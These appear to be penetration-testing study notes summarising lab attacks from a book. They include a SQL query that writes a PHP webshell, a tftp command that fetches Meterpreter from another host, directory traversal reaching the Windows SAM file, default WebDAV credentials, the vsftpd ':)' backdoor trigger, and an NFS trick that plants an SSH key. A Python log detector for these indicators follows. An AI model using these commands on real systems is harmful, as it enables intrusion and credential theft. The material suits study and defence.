Source: Georgia Weidman on "Advanced Penetration Test"

(1) WebDAV Default Credentials
    Default -> wampp:xampp
    a. cadaver http://192.168.0.190/webdav
    b. Use msfvenom to create a PHP shell and upload it
    c. Use msfconsole to exploit

(2) Open phpMyAdmin
    a. Create a PHP shell on the Apache server using a SQL query:
       SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"
       http://192.168.0.190/shell.php?cmd=ipconfig
    b. Add a Meterpreter PHP file:
       http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php

(3) Downloading Sensitive Files
    Zervit 0.4 directory traversal:
    nc 192.168.20.10 3232
    GET /../../../../../boot.ini HTTP/1.1
    http://192.168.0.190:3232/index.html?../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml
    http://192.168.0.190:3232/index.html?../../../../../../WINDOWS/repair/sam

(4) Exploiting a Buffer Overflow
    Buffer overflow in SLMail -> windows/pop3/seattlelab_pass

(5) Exploiting a Web Application
    Unsanitized parameter in graph_formula.php -> PHP code execution -> unix/webapp/tikiwiki_graph_formula_exec

(6) Piggybacking on a Compromised Service
    VsFTP -> backdoored: a username ending in :) spawned a backdoor on port 6200

(7) Exploiting Open NFS Shares
    NFS on port 2049
    showmount -e 172.16.85.136
    ssh-keygen
    mkdir /tmp/r00t/
    mount -t nfs -o nolock 172.16.85.136:/export/username/ /tmp/r00t/
    cat ~/.ssh/id_rsa.pub >> /tmp/r00t/.ssh/authorized_keys
    umount /tmp/r00t/
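Defender-side example added here (not from the page or from the book it summarises): a small Python detector that flags, in log lines, the three indicators these notes leave behind on the target side: the "../" traversal and sensitive-file requests against Zervit (3), requests to a .php file carrying a cmd= parameter as in shell.php (2), and an FTP login whose username ends in ":)" (6). Every log line is constructed for the example; the Apache combined-log and vsftpd log layouts, and the helper names normalize, classify_request, scan_http and scan_ftp, are assumptions of this example.

```python
"""Added example: flag the indicators from the notes above in log lines.
All log lines below are constructed for this example, not taken from the page."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined-log style lines (format assumed), constructed. Line 0 is benign.
# Line 3 uses double percent-encoding (%252e -> %2e -> .) to show why decoding must repeat.
SAMPLE_HTTP_LINES = [
    '192.168.20.10 - - [04/Jul/2016:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.168.20.10 - - [04/Jul/2016:10:00:02 +0000] "GET /../../../../../boot.ini HTTP/1.1" 200 322',
    '192.168.20.10 - - [04/Jul/2016:10:00:03 +0000] "GET /index.html?../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml HTTP/1.1" 200 1984',
    '192.168.20.10 - - [04/Jul/2016:10:00:04 +0000] "GET /index.html?%252e%252e%252f%252e%252e%252fWINDOWS/repair/sam HTTP/1.1" 200 24576',
    '192.168.20.10 - - [04/Jul/2016:10:00:05 +0000] "GET /shell.php?cmd=ipconfig HTTP/1.1" 200 77',
]

# vsftpd-style log lines (format assumed), constructed.
SAMPLE_FTP_LINES = [
    'Mon Jul  4 10:05:00 2016 [pid 2103] [alice] OK LOGIN: Client "192.168.20.10"',
    'Mon Jul  4 10:05:09 2016 [pid 2110] [bob:)] FAIL LOGIN: Client "192.168.20.10"',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
FTP_USER_RE = re.compile(r"\[pid \d+\] \[(?P<user>[^\]]*)\]")

# Files the notes show being pulled through the traversal; matched after normalisation.
SENSITIVE_PATHS = ("boot.ini", "windows/repair/sam", "filezilla server.xml")


def normalize(target: str, rounds: int = 3) -> str:
    """Percent-decode until stable (defeats double encoding), unify slashes, lowercase."""
    current = target
    for _ in range(rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current.replace("\\", "/").lower()


def classify_request(target: str) -> list[str]:
    """Return the reasons a request target matches one of the patterns above (empty if none)."""
    reasons = []
    norm = normalize(target)
    if "../" in norm:
        reasons.append("directory traversal")
    if any(p in norm for p in SENSITIVE_PATHS):
        reasons.append("sensitive file request")
    parts = urlsplit(norm)
    # parse_qs drops "key-only" query strings such as the traversal payloads above,
    # so only a real cmd=... pair on a .php path triggers this reason.
    if parts.path.endswith(".php") and "cmd" in parse_qs(parts.query):
        reasons.append("command parameter to php script")
    return reasons


def scan_http(lines):
    """Map line index -> reasons for every line that matches at least one pattern."""
    findings = {}
    for idx, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            findings[idx] = reasons
    return findings


def scan_ftp(lines):
    """Map line index -> username for logins whose username ends in ':)'."""
    hits = {}
    for idx, line in enumerate(lines):
        m = FTP_USER_RE.search(line)
        if m and m.group("user").endswith(":)"):
            hits[idx] = m.group("user")
    return hits


if __name__ == "__main__":
    for idx, reasons in scan_http(SAMPLE_HTTP_LINES).items():
        print(f"http line {idx}: {', '.join(reasons)}")
    for idx, user in scan_ftp(SAMPLE_FTP_LINES).items():
        print(f"ftp line {idx}: backdoor trigger username {user!r}")
```

The repeated percent-decoding in normalize is the part worth copying: a single unquote call would leave line 3 looking like an ordinary query string, which is exactly how double-encoded traversal slips past naive filters. On a real host the same two scanners would read the web server's access log and vsftpd.log instead of the constructed lists.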
Author: Vitali Kremez
July 2016